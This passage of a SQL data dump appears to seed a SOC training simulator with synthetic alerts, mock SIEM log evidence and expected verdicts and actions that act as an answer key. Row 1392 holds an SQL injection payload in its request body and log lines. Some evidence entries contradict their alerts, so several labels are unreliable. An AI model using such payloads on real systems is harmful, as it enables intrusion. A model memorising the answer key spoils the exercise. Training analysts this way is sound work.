3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.1\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"networkscanner\\\",\\\"hostname\\\":\\\"scanner-host\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:25:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.1.1.1\\\",\\\"dst_ip\\\":\\\"10.1.1.10\\\",\\\"username\\\":\\\"networkscanner\\\",\\\"hostname\\\":\\\"scanner-host\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1387, 'Brute Force Attack from Foreign IP', 'medium', 'Splunk', 'Multiple failed login attempts detected from an external IP known for malicious activity.', 'Brute Force', 'T1110', 0, 'Closed', 142, '{\"timestamp\":\"2026-03-02T08:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"185.92.220.50\",\"dst_ip\":\"192.168.1.15\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER01\",\"failed_attempts\":45}', '2026-03-02 03:09:19', '2026-03-07 05:14:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP is flagged as malicious with multiple failed login attempts, confirming the brute force attack.\"}', 'Novice', 'SIEM', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.220.50\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-02T13:54:06.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.220.50\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-02T13:53:06.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.220.50\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-02T13:52:06.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.220.50\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"failed_attempts\\\":45}\"},{\"timestamp\":\"2026-03-02T13:51:06.915Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"185.92.220.50\\\",\\\"dst_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"failed_attempts\\\":45}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1388, 'Suspicious Login Activity', 'low', 'Wazuh', 'Unusual login attempts detected from a known VPN server.', 'Brute Force', 'T1110', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T10:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.101\",\"dst_ip\":\"192.168.2.25\",\"username\":\"jdoe\",\"hostname\":\"WORKSTATION01\",\"failed_attempts\":10}', '2026-03-02 03:09:19', '2026-03-07 11:44:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with VPN use, not flagged as malicious\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Regular user account\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is associated with VPN use but not flagged as malicious, indicating benign activity.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.917Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-02T13:54:06.917Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-02T13:53:06.917Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-02T13:52:06.917Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"failed_attempts\\\":10}\"},{\"timestamp\":\"2026-03-02T13:51:06.917Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"dst_ip\\\":\\\"192.168.2.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"WORKSTATION01\\\",\\\"failed_attempts\\\":10}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1389, 'Potential Malware Detected by File Hash', 'high', 'Elastic SIEM', 'A file with a known malicious hash was executed on an internal machine.', 'Malware', 'T1059', 0, 'investigating', NULL, '{\"timestamp\":\"2026-03-02T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.5\",\"dst_ip\":\"\",\"username\":\"bsmith\",\"hostname\":\"LAPTOP01\",\"command_line\":\"C:\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-02 03:09:19', '2026-03-09 13:55:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No detections found for this hash\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common false positive hash\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.3.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash was not detected as malicious, indicating a false positive.\"}', 'Novice', 'SIEM', 1, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.918Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"LAPTOP01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.918Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"LAPTOP01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.918Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"LAPTOP01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.918Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"LAPTOP01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.918Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.5\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"LAPTOP01\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malicious.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1390, 'Phishing Email with Suspicious URL', 'medium', 'Azure Sentinel', 'A phishing email was detected containing a suspicious URL.', 'Phishing', 'T1566', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T12:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.12\",\"email_sender\":\"fake@phishingsite.com\",\"username\":\"jdoe\",\"hostname\":\"MAILSERVER\",\"url\":\"http://suspicious-url.com/login\"}', '2026-03-02 03:09:19', '2026-03-06 10:28:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"fake@phishingsite.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain known for phishing attempts\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://suspicious-url.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"URL associated with phishing domains\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"IP associated with phishing emails\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing email contains a suspicious URL, but no malicious activity confirmed.\"}', 'Novice', 'SIEM', 1, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.12\\\",\\\"email_sender\\\":\\\"fake@phishingsite.com\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"MAILSERVER\\\",\\\"url\\\":\\\"http://suspicious-url.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.12\\\",\\\"email_sender\\\":\\\"fake@phishingsite.com\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"MAILSERVER\\\",\\\"url\\\":\\\"http://suspicious-url.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.12\\\",\\\"email_sender\\\":\\\"fake@phishingsite.com\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"MAILSERVER\\\",\\\"url\\\":\\\"http://suspicious-url.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.12\\\",\\\"email_sender\\\":\\\"fake@phishingsite.com\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"MAILSERVER\\\",\\\"url\\\":\\\"http://suspicious-url.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.12\\\",\\\"email_sender\\\":\\\"fake@phishingsite.com\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"MAILSERVER\\\",\\\"url\\\":\\\"http://suspicious-url.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1391, 'Unusual Network Connection to External IP', 'low', 'Splunk', 'A device attempted to connect to an external IP known for hosting benign services.', 'Network Anomaly', 'T1071', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T13:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.4.10\",\"dst_ip\":\"93.184.216.34\",\"username\":\"psmith\",\"hostname\":\"DESKTOP02\"}', '2026-03-02 03:09:19', '2026-03-09 02:45:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"93.184.216.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"IP associated with benign web services\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.4.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"psmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Regular user account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The external IP is associated with benign services, indicating a false positive.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.921Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"psmith\\\",\\\"hostname\\\":\\\"DESKTOP02\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.921Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"psmith\\\",\\\"hostname\\\":\\\"DESKTOP02\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.921Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"psmith\\\",\\\"hostname\\\":\\\"DESKTOP02\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.921Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"psmith\\\",\\\"hostname\\\":\\\"DESKTOP02\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.921Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.10\\\",\\\"dst_ip\\\":\\\"93.184.216.34\\\",\\\"username\\\":\\\"psmith\\\",\\\"hostname\\\":\\\"DESKTOP02\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1392, 'SQL Injection Attempt on Internal Web Server', 'high', 'Wazuh', 'An SQL injection attempt was detected targeting the internal web server.', 'Web Attack', 'T1190', 0, 'investigating', 56, '{\"timestamp\":\"2026-03-02T14:10:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.200\",\"dst_ip\":\"192.168.5.20\",\"username\":\"webuser\",\"hostname\":\"WEB-SERVER01\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-03-02 03:09:19', '2026-03-03 15:52:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.5.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal web server\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload and external IP confirm a true positive SQL injection attempt.\"}', 'Novice', 'SIEM', 1, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.922Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.5.20\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.922Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.5.20\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.922Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.5.20\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.922Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.5.20\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"WEB-SERVER01\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.922Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 